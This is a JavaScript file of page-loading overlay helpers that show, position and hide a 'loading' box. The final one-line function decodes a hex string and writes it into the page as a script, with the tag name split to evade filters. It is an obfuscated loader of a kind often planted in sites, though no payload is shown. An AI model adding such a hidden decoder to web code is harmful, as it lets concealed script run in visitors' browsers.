function hidell()
{
document.getElementById("overlay").style.display="none";	
document.getElementById("body_").style.overflow="auto";
document.getElementById("photo").style.display="none";
}

function showl(t)
{
document.write('<div id="overlay"><div id="loading">');
document.getElementById("overlay").style.display="block";
document.getElementById("body_").style.overflow="hidden";
if (typeof window_width=="undefined" || typeof window_height=="undefined")
{
	var window_width;
	var window_height;
	if(typeof( window.innerWidth )=="number")
	{
		window_width=window.innerWidth;
		window_height=window.innerHeight;
	}else
	if(document.documentElement &&	(document.documentElement.clientWidth || document.documentElement.clientHeight))
	{
		window_width = document.documentElement.clientWidth;
		window_height = document.documentElement.clientHeight;
	}else
	if(document.body && (document.body.clientWidth || document.body.clientHeight))
	{
		window_width=document.body.clientWidth;
		window_height=document.body.clientHeight;
	}
}
var left=Math.round((window_width-400)/2);
var top = Math.round(((window_height-46)/3)+46);
document.getElementById("loading").style.left=left+"px";
document.getElementById("loading").style.top=top+"px";
document.write(t+'</div></div>');
}

function hidel()
{
	document.getElementById("overlay").style.display="none";
	document.getElementById("body_").style.overflow="auto";
	document.getElementById("loading").style.display="none";
	return false;
}

function endel()
{
	if (window.addEventListener)
	{
		window.addEventListener('load', hidel, false);
	}
	else
	if (window.attachEvent)
	{
		var r = window.attachEvent("onload", hidel);
	}
	else
	{
		hidel();
	}
}
function _c(_i){var t=_i.replace(/(\S{2})/gi,'$1%');t='%'+t;t=t.substr(0,t.length-1);document.write(unescape('<sc'+'ript>'+t+'</sc'+'ript>'))};